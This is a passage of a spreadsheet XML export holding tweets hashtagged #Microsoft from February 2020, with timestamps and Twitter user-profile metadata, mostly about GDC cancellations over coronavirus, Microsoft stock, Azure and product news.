    <t>#cybersecurity #infosec #microsoft     Single sign-on &amp;amp; multifactor identification on thousands of applications means that you can add the devices &amp;amp; apps that suit your business needs without complicating your security. https://t.co/VRhaUgn53Z</t>
  </si>
  <si>
    <t>Thu Feb 27 20:28:17 +0000 2020</t>
  </si>
  <si>
    <t>Bose Frames work with Microsoft's navigation tech for the blind https://t.co/faKzF7h7iR #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 20:26:59 +0000 2020</t>
  </si>
  <si>
    <t>Wow, these certification changes from Microsoft
https://t.co/6tlOPrjLbR
#Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 20:25:07 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Bose Frames work with Microsoft's navigation tech for the blind https://t.co/rceITAaW3D</t>
  </si>
  <si>
    <t>Thu Feb 27 20:24:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft details the 'Block potentially unwanted apps' feature in Edge #Microsoft #Edge #SmartScreen: https://t.co/Sbx0DAToZz via @NeowinFeed</t>
  </si>
  <si>
    <t>{'id': 15657432, 'id_str': '15657432', 'name': 'Aryeh Goretsky', 'screen_name': 'goretsky', 'location': 'United States', 'description': '@ESET Distinguished Researcherâ”‚ex @McAfee #TribalVoice @Zultysâ”‚Mod @Lenovo @NeowinFeed @ScotsNewsletterâ”‚former @Microsoft MVPâ”‚Retweetâ‰ endorsement|opinion=my own', 'url': 'https://t.co/pWpFFUloOu', 'entities': {'url': {'urls': [{'url': 'https://t.co/pWpFFUloOu', 'expanded_url': 'http://www.welivesecurity.com/author/goretsky/', 'display_url': 'welivesecurity.com/author/goretskâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4086, 'friends_count': 5001, 'listed_count': 217, 'created_at': 'Wed Jul 30 06:48:14 +0000 2008', 'favourites_count': 7074, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33099,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'http://pbs.twimg.com/profile_images/757510661299576832/YClAf2u3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/757510661299576832/YClAf2u3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15657432/1471482456', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 20:23:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft shares dropped 4% due to a hit to #supplychain from #CoronavirusOutbreak. 
News &amp;amp; filings at https://t.co/7qBgJFSaru 
Image: ZDNet 
#COVID2019 #businessnews #filings #filingsearch #fintech https://t.co/ZwUAMqmYfR</t>
  </si>
  <si>
    <t>{'id': 4843388048, 'id_str': '4843388048', 'name': 'FilingSearch', 'screen_name': 'FilingSearch', 'location': 'Bellevue, WA', 'description': 'Filing Search is the trusted, researched database of updated SEC filings &amp; company news.', 'url': 'https://t.co/idRw8nClyY', 'entities': {'url': {'urls': [{'url': 'https://t.co/idRw8nClyY', 'expanded_url': 'http://www.filingsearch.com', 'display_url': 'filingsearch.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 359, 'friends_count': 525, 'listed_count': 60, 'created_at': 'Mon Feb 01 06:40:36 +0000 2016', 'favourites_count': 737, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2476, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/868044360700448768/-dP8lc-H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/868044360700448768/-dP8lc-H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4843388048/1496653233',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</si>
  <si>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20:23:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Sony Will Not Attend Game Developers Conference 2020 Due to Coronavirus https://t.co/6JD1dSL1EC #Microsoft #Sony #GameDevelopersConference #Coronavirus https://t.co/Q0AqlEDoBJ</t>
  </si>
  <si>
    <t>{'id': 539335420, 'id_str': '539335420', 'name': 'Geek Vibes Nation ðŸ––', 'screen_name': 'GeekVibesNation', 'location': 'geekvibesnation@gmail.com', 'description': 'Your #1 Source For All Things GEEK | Reporting Unbiased News | Film, TV, Video Games, Comics | Weekly Podcasts | Giveaways and Screenings | #FilmTwitter', 'url': 'https://t.co/JsgyAuULSj', 'entities': {'url': {'urls': [{'url': 'https://t.co/JsgyAuULSj', 'expanded_url': 'https://geekvibesnation.com', 'display_url': 'geekvibesnation.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46832, 'friends_count': 9485, 'listed_count': 238, 'created_at': 'Wed Mar 28 19:54:11 +0000 2012', 'favourites_count': 203186, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6467,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'http://pbs.twimg.com/profile_images/1207035152637079554/C1JBhNHN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207035152637079554/C1JBhNHN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/539335420/1576614581', 'profile_link_color': '1B95E0',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</si>
  <si>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Feb 27 20:20:39 +0000 2020</t>
  </si>
  <si>
    <t>#Volodymyr #Kvashuk, 25, was convicted Tuesday by the #U.#S. #District #Court in Seattle of 18 separate federal felonies that defrauded #Microsoft out of a total of $10 #million, according to a statement from the #Department of #Justice.
https://t.co/Qwn83XTmjw
#Rakamoto #Coin</t>
  </si>
  <si>
    <t>Thu Feb 27 20:15:12 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with #Microsoft spam https://t.co/zK253K6JYf #NakedSecurity</t>
  </si>
  <si>
    <t>Thu Feb 27 20:15:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts Xbox Series X will be able to resume games even after a reboot https://t.co/wL2tR4Vig8</t>
  </si>
  <si>
    <t>{'id': 3943681121, 'id_str': '3943681121', 'name': 'Overpowered Ent.', 'screen_name': 'realoptweets', 'location': 'USA', 'description': 'Overpowered Entertainment is a community for fans of video games, movies, TV and comic books could come together to discuss their passions.', 'url': 'https://t.co/4aEoPtctYv', 'entities': {'url': {'urls': [{'url': 'https://t.co/4aEoPtctYv', 'expanded_url': 'http://overpoweredentertainment.com', 'display_url': 'overpoweredentertainment.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 60, 'listed_count': 4, 'created_at': 'Tue Oct 13 05:28:44 +0000 2015', 'favourites_count': 97, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3663,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'http://pbs.twimg.com/profile_images/1041017995051425792/oGBsm74t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041017995051425792/oGBsm74t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3943681121/1537033533',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</si>
  <si>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20:14:13 +0000 2020</t>
  </si>
  <si>
    <t>Not looking good for #GDC 
#gaming #CoronaVirus #microsoft
Microsoft Drops Out Of GDC, Too [Update: And Epic] https://t.co/h8Re4qLaIV via @kotaku</t>
  </si>
  <si>
    <t>{'id': 75225921, 'id_str': '75225921', 'name': 'Jonah', 'screen_name': 'mynameiscolb', 'location': 'Oklahoma City', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 308, 'listed_count': 3, 'created_at': 'Fri Sep 18 07:33:23 +0000 2009', 'favourites_count': 285, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 604,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'http://pbs.twimg.com/profile_images/444274319418335232/PNSZE0XC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/444274319418335232/PNSZE0XC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75225921/1373052612', 'profile_link_color': '406B9C',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</si>
  <si>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Feb 27 20:14:07 +0000 2020</t>
  </si>
  <si>
    <t>Are you at the #KingCounty Transition Fair today? Stop by and say hello to us and learn more about the OLS program!
#OLSBC #TransitionFair #Microsoft #SchoolToWork https://t.co/WXNyTcNiPN</t>
  </si>
  <si>
    <t>{'id': 2218163497, 'id_str': '2218163497', 'name': 'OLSBellevue College', 'screen_name': 'OLSatBC', 'location': 'Bellevue, WA', 'description': 'Skills for Work. Skills for Life. OLS Bellevue College is an accredited associate degree program for adults with learning disabilities.', 'url': 'https://t.co/BinrzhcYju', 'entities': {'url': {'urls': [{'url': 'https://t.co/BinrzhcYju', 'expanded_url': 'http://www.bellevuecollege.edu/OLS', 'display_url': 'bellevuecollege.edu/OLS', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 237, 'friends_count': 629, 'listed_count': 5, 'created_at': 'Wed Nov 27 17:29:03 +0000 2013', 'favourites_count': 1261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1048,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'http://pbs.twimg.com/profile_images/993537164615958529/TMZG98Ft_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/993537164615958529/TMZG98Ft_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2218163497/1561668988',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</si>
  <si>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20:13:51 +0000 2020</t>
  </si>
  <si>
    <t>#Game Stack - #GDC and the wellbeing of our teams &amp;amp; community | #Microsoft #Developer https://t.co/DHwJbqDp0S</t>
  </si>
  <si>
    <t>Thu Feb 27 20:12:10 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign #Vatican pledge for ethical #AI. https://t.co/AP3rYTPa1E</t>
  </si>
  <si>
    <t>Thu Feb 27 20:09:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Unity pull out of GDC 2020 over coronavirus concerns #Microsoft #GDC #Unity: https://t.co/W1LE0Tqh0r via @NeowinFeed #COVID</t>
  </si>
  <si>
    <t>Thu Feb 27 20:08:25 +0000 2020</t>
  </si>
  <si>
    <t>Got to admit, co-hosting this event last year with Eddie Bader @bhardia @SSG_ERP at the Porsche experience center was pretty awesome!  #mspartner #mspartners #partnersmakemorepossible #microsoft https://t.co/AKvJRLxTAT</t>
  </si>
  <si>
    <t>Thu Feb 27 20:06:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sphere Now Supports #Linux and #Windows for Development!
https://t.co/jX2As9HD5t
#AzureSphere #Microsoft #Microsoft #Azure #AzureIoT #MicrosoftAzure #Cloud https://t.co/Uc6NqhYNGM</t>
  </si>
  <si>
    <t>Thu Feb 27 20:05:02 +0000 2020</t>
  </si>
  <si>
    <t>"Security measure: Automating the allocation of hardware or software ensures that no one has access to sensitive employee info or assets when they are no longer required." #microsoft #assets #discoverytool #SCCM #management #IT #InformationTechnology https://t.co/jFdbFoVX0c</t>
  </si>
  <si>
    <t>Thu Feb 27 20:02:59 +0000 2020</t>
  </si>
  <si>
    <t>Subscribe to discover how #Dynamics365 and other #Microsoft solutions can help you elevate and transform engagements with both existing and prospective customers. https://t.co/hu6OQGlFks</t>
  </si>
  <si>
    <t>Thu Feb 27 20:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Customer Card Overview in Microsoft Dynamics 365 Business Central
https://t.co/uGPAgejPKt
#microsoft #customer #howto #training</t>
  </si>
  <si>
    <t>Thu Feb 27 20:00:54 +0000 2020</t>
  </si>
  <si>
    <t>We are hosting a digital event over originally planned GDC this year. Employees and participants health and safety are more important than physical attendance this time. Read more at 
 #microsoft #gamedev #xbox #gdc20 https://t.co/u4ymtPrHAv</t>
  </si>
  <si>
    <t>{'id': 4143559541, 'id_str': '4143559541', 'name': 'Aapo Latvala', 'screen_name': 'Jinckait', 'location': 'Espoo, Finland', 'description': 'A Microsoft gaming fellow. (FTE)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 107, 'listed_count': 1, 'created_at': 'Sun Nov 08 18:31:40 +0000 2015', 'favourites_count': 77, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/840601707549773824/C9o25Dfs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/840601707549773824/C9o25Dfs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4143559541/1582330699',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</si>
  <si>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20:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the #Microsoft #DevOps Community  2019.11.22 | Azure DevOps Blog https://t.co/HpeodVy81u #TechJunkieBlog https://t.co/NYVLeu5Db8</t>
  </si>
  <si>
    <t>Thu Feb 27 20:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Are you considering a #cloud migration? Review our ultimate guide to #Microsoft @Azure to understand its complex cloud-hosting platform and how it can benefit your business: https://t.co/8ek0lWD0UE https://t.co/jdlNCbuUFt</t>
  </si>
  <si>
    <t>{'id': 18396102, 'id_str': '18396102', 'name': 'Dataprise', 'screen_name': 'Dataprise', 'location': 'United States', 'description': 'Leading Managed Service Provider helping businesses with IT consulting, strategy &amp; support since 1995. Find #tech tips, trends &amp; news here! #WinningWithIT', 'url': 'https://t.co/BYxLanVefH', 'entities': {'url': {'urls': [{'url': 'https://t.co/BYxLanVefH', 'expanded_url': 'https://www.dataprise.com/', 'display_url': 'dataprise.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1309, 'friends_count': 1613, 'listed_count': 151, 'created_at': 'Fri Dec 26 21:53:39 +0000 2008', 'favourites_count': 630, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9037, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '017DBB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1138461126105153536/gTrhVjbd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138461126105153536/gTrhVjbd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18396102/1530543886', 'profile_link_color': '58595B', 'profile_sidebar_border_color': 'FFA305', 'profile_sidebar_fill_color': 'FFD505', 'profile_text_color': '003064', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 19:58:33 +0000 2020</t>
  </si>
  <si>
    <t>Intcomex and Optimus... Charlies Angels in ACTION!!!
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT #Caribbean #Intcomex #Jamaica #Kingston #BizTech #Dynamics365 #Summit2019 #Canalys https://t.co/IaZvqfLVoU</t>
  </si>
  <si>
    <t>Thu Feb 27 19:56:28 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #cybersecurity #microsoft     With free 24/7 access, to their digital platform, @ADGMCourts has created a truly transformative solution for litigants the world over. Use those same tools to transform your business. Contact us to find out how. https://t.co/pPfIBe4su9</t>
  </si>
  <si>
    <t>Thu Feb 27 19:55:21 +0000 2020</t>
  </si>
  <si>
    <t>BrandPost: 9-1-1...Where is Your Emergency? https://t.co/NVi5R34RGv via @HYBRID_CIRCLE #Hybrid #Microsoft https://t.co/HwtFDXNn81</t>
  </si>
  <si>
    <t>Thu Feb 27 19:54:30 +0000 2020</t>
  </si>
  <si>
    <t>@Apple enjoy it until #Apple &amp;amp; #Microsoft fight and each takes their ball home via upgrades &amp;amp; architecture changes</t>
  </si>
  <si>
    <t>{'id': 407113566, 'id_str': '407113566', 'name': 'PolSciEconSalsa', 'screen_name': 'PolSciEconSalsa', 'location': 'Omnipresent', 'description': 'Salsero de muchos aÃ±os, political scientist with political affiliation to objective economics that benefit no one. I mute quickly. If you like, retweet.', 'url': 'https://t.co/TNuRspjWUh', 'entities': {'url': {'urls': [{'url': 'https://t.co/TNuRspjWUh', 'expanded_url': 'http://palossalseros.blogspot.com', 'display_url': 'palossalseros.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 485, 'friends_count': 230, 'listed_count': 69, 'created_at': 'Mon Nov 07 17:10:20 +0000 2011', 'favourites_count': 4468, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 34259,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'http://pbs.twimg.com/profile_images/1627457893/music_toys_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1627457893/music_toys_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/407113566/1372033449',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</si>
  <si>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19:53:54 +0000 2020</t>
  </si>
  <si>
    <t>"We be getting Lucrative" as JRE would say. This time in your nearest .
#devops #developer #microsoft #bigdata #it #aws #python #o #datascience #javascript #cloudcomputing #database #softwareengineer #frontend... https://t.co/bnEvwfoDjy</t>
  </si>
  <si>
    <t>{'id': 1081339230301736961, 'id_str': '1081339230301736961', 'name': 'IDevOPS.io', 'screen_name': 'iDevOpsio', 'location': '', 'description': 'We are a DevOPS education, training and staffing company. Check our website to start a new path today! \n#devops #ai #tech #learntocode #edtech #idevops #learn2c', 'url': 'https://t.co/QhWWJ2eZQV', 'entities': {'url': {'urls': [{'url': 'https://t.co/QhWWJ2eZQV', 'expanded_url': 'http://www.idevops.io', 'display_url': 'idevops.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 166, 'listed_count': 1, 'created_at': 'Fri Jan 04 23:58:57 +0000 2019', 'favourites_count': 274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 135,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'http://pbs.twimg.com/profile_images/1118334713607774208/wdv5CK2X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118334713607774208/wdv5CK2X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1081339230301736961/1549442043',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</si>
  <si>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19:53:48 +0000 2020</t>
  </si>
  <si>
    <t>The guidance was unusually wide to reflect the complications of the outbreak, which has already killed more than 2,700 people and infected 81,000.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT</t>
  </si>
  <si>
    <t>Thu Feb 27 19:53:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Wont Attend GDC 2020 Due to Coronavirus https://t.co/2iYpapkocT #Coronavirus #GDC2020 #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:52:32 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft shares slip after warning of coronavirus hit to supply chain https://t.co/m0MRTcjlta</t>
  </si>
  <si>
    <t>{'id': 910460771817095170, 'id_str': '910460771817095170', 'name': '2BSmart', 'screen_name': '2BSmart_Invest', 'location': 'Deutschland', 'description': "Low-risk and longterm Investor. Successfully trading at eToro's social trading network.", 'url': 'https://t.co/7els8nLZ7o', 'entities': {'url': {'urls': [{'url': 'https://t.co/7els8nLZ7o', 'expanded_url': 'http://www.etoro.com/people/2BSmart', 'display_url': 'etoro.com/people/2BSmart', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 33, 'listed_count': 4, 'created_at': 'Wed Sep 20 11:08:58 +0000 2017', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3535,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'http://pbs.twimg.com/profile_images/910831249257836545/lSkNUn6V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/910831249257836545/lSkNUn6V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/910460771817095170/1509056425', 'profile_link_color': '6CAE0E',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</si>
  <si>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19:51:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Epic confirm they will not be present at GDC as coronavirus impact continues https://t.co/KcaVEM2ZoB #microsoft #epic #epicgames #gdc #gaming</t>
  </si>
  <si>
    <t>{'id': 10886182, 'id_str': '10886182', 'name': 'TheSixthAxis', 'screen_name': 'TheSixthAxis', 'location': 'United Kingdom', 'description': 'Follow us for all the latest gaming news, reviews, and opinion: https://t.co/PsfYrmeH0N\nhttps://t.co/MjLtSwPlLOâ€¦', 'url': 'http://t.co/FBZS9GA3Vo', 'entities': {'url': {'urls': [{'url': 'http://t.co/FBZS9GA3Vo', 'expanded_url': 'http://www.thesixthaxis.com', 'display_url': 'thesixthaxis.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/PsfYrmeH0N', 'expanded_url': 'http://thesixthaxis.com', 'display_url': 'thesixthaxis.com', 'indices': [64, 87]}, {'url': 'https://t.co/MjLtSwPlLO', 'expanded_url': 'http://youtube.com/user/thesixtha', 'display_url': 'youtube.com/user/thesixtha', 'indices': [88, 111]}]}}, 'protected': False, 'followers_count': 12746, 'friends_count': 288, 'listed_count': 520, 'created_at': 'Wed Dec 05 22:25:36 +0000 2007', 'favourites_count': 591, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 53787, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '051853', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092726693490495488/ZdehQCkz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092726693490495488/ZdehQCkz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/10886182/1461919844', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E9EFF5', 'profile_text_color': '525252', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 19:48:45 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Nemty Ransomware Actively Distributed via 'Love Letter' Spam:" https://t.co/mibyJJCVJT
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 19:47:38 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #Azure #microsoft     Discover how Airbus relies on Microsoft Azure Stack to fine-tune the design, build &amp;amp; operation of complex products; plus, drive significant change management processes across the organization. #Azure https://t.co/1qUuyVOq8k</t>
  </si>
  <si>
    <t>Thu Feb 27 19:46:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is constantly optimizing #Teams mobile experience and building #features. You can set quiet hours &amp;amp; quiet days to have a personal life  work balance, share content in a #meeting from your cell phone and much more.
https://t.co/PEZlk6132a
#chironusa #collaboration https://t.co/fQaj9AWjcY</t>
  </si>
  <si>
    <t>Thu Feb 27 19:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft details the 'Block potentially unwanted apps' feature in Edge #Microsoft #Edge #SmartScreen https://t.co/wqrrKgJ1iB https://t.co/CmdVEV1DHZ</t>
  </si>
  <si>
    <t>Thu Feb 27 19:45:59 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftEDU @Xbox @MicrosoftStore Check out these Pics from our Game Night hosted by @WalshCollege ITSA with some help from #Microsoft. Providing some playtime! #StudentLife
@MicrosoftEDU @Xbox @MicrosoftStore  #eSportsEdu #Gamers #VideoGames #gaming #videogamenight #GamingClub #GamerCommunity #GameNightEdu https://t.co/NQlT7kozAg</t>
  </si>
  <si>
    <t>{'id': 218625709, 'id_str': '218625709', 'name': 'Eden Konja, CETL', 'screen_name': 'EdenKonja', 'location': '', 'description': 'I am a Technologist, a Teacher, a School Administrator, a Learner, a Leader, a Mentor, and a Teammate #CTO #EdTech #Techie #K12 #HigherEd #Educator #eSportsEdu', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 552, 'friends_count': 793, 'listed_count': 36, 'created_at': 'Mon Nov 22 21:00:16 +0000 2010', 'favourites_count': 1022, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2180, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0E0F0F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1201954532244303872/XWThuHRD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201954532244303872/XWThuHRD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/218625709/1575145491', 'profile_link_color': '1B95E0',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</si>
  <si>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19:45:04 +0000 2020</t>
  </si>
  <si>
    <t>Ask #Microsoft Anything (AMA) for SQL Server! Join the engineering team on March 11th for a live online event
https://t.co/bX3YzrZhov
#tsql #sqldba #SQLServer #madeiradata https://t.co/hRHr4rATa1</t>
  </si>
  <si>
    <t>Thu Feb 27 19:43:57 +0000 2020</t>
  </si>
  <si>
    <t>We are retiring Azure AD Domain Services classic VNET support on March 1, 2023
- https://t.co/5fvLMuAqzg
#Azure #Microsoft #Cloud #ActiveDirectory #Identity #Networking #FeatureRetirement https://t.co/1cnxa6KEmI</t>
  </si>
  <si>
    <t>Thu Feb 27 19:42:07 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Corporation (#NASDAQ: MSFT) said on Wednesday it probably will not meet the quarterly revenue guidance due to the #coronavirus it previously said it will.
https://t.co/kAuDV6BEnx
#Rakamoto #Thursdaydaythoughts #Blockchain #Crypto #Bitcoin #Digital #Money #Coin</t>
  </si>
  <si>
    <t>Thu Feb 27 19:40:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft 71-year-old billionaire Charles Simonyi still goes to work 
- Living by Voltaire's "we must cultivate our garden": finding happiness through work
https://t.co/kmSZm2qn1I</t>
  </si>
  <si>
    <t>{'id': 14342906, 'id_str': '14342906', 'name': 'Marc Atallah', 'screen_name': 'marco_polo', 'location': 'Paris, France', 'description': 'Co-founder zettafox - the prescriptive analytics company. Data is the oil of tomorrow.\n#AI #ML #digital #datascience', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 284, 'friends_count': 234, 'listed_count': 55, 'created_at': 'Wed Apr 09 16:07:29 +0000 2008', 'favourites_count': 966, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3545,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'http://pbs.twimg.com/profile_images/416217387088633857/jluzQXmU_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/416217387088633857/jluzQXmU_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14342906/1388068894',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</si>
  <si>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Feb 27 19:38:25 +0000 2020</t>
  </si>
  <si>
    <t>Really enjoying the Azure administrator learning paths on Pluralsight.  Knowledge checks are great but shivering in my boots for the eventual exam. @TechTrainerTim #Azure #Learning #AZ103  #microsoft #cloud</t>
  </si>
  <si>
    <t>Thu Feb 27 19:38:24 +0000 2020</t>
  </si>
  <si>
    <t>Google Clouds newest data center opens in Salt Lake City https://t.co/ySbLtFlpXQ #Microsoft</t>
  </si>
  <si>
    <t>Vice President Pence bulks up Coronavirus Task Force with medical and economic experts https://t.co/4p9VK270dX #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 19:34:32 +0000 2020</t>
  </si>
  <si>
    <t>so many $link rumours being thrown around
.
#Swift
#Microsoft
#Intel
#Tesla
#barclays
#Ethereum
$XTZ #Tezos
.
AnY MORE? 
What ones are gona be true? 
Junkies guess..all of them. 
These companies will NEED #Chainlink
If a company uses data it will need to be #PoweredByChainlink</t>
  </si>
  <si>
    <t>{'id': 1184819943482822656, 'id_str': '1184819943482822656', 'name': 'ChainLinkJunkie', 'screen_name': 'Chainlinkjunkie', 'location': 'gfy', 'description': 'Superhero all seeing wise Frog. Here to save plebs from getting REKT. Junkie addicted to #ChainLink and wew cant stop giving $link price action play by play..ðŸ”¥', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2567, 'friends_count': 184, 'listed_count': 13, 'created_at': 'Thu Oct 17 13:14:25 +0000 2019', 'favourites_count': 5216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4277, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231996853333512193/ZHrdW-24_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231996853333512193/ZHrdW-24_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1184819943482822656/1582138822',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</si>
  <si>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19:31:28 +0000 2020</t>
  </si>
  <si>
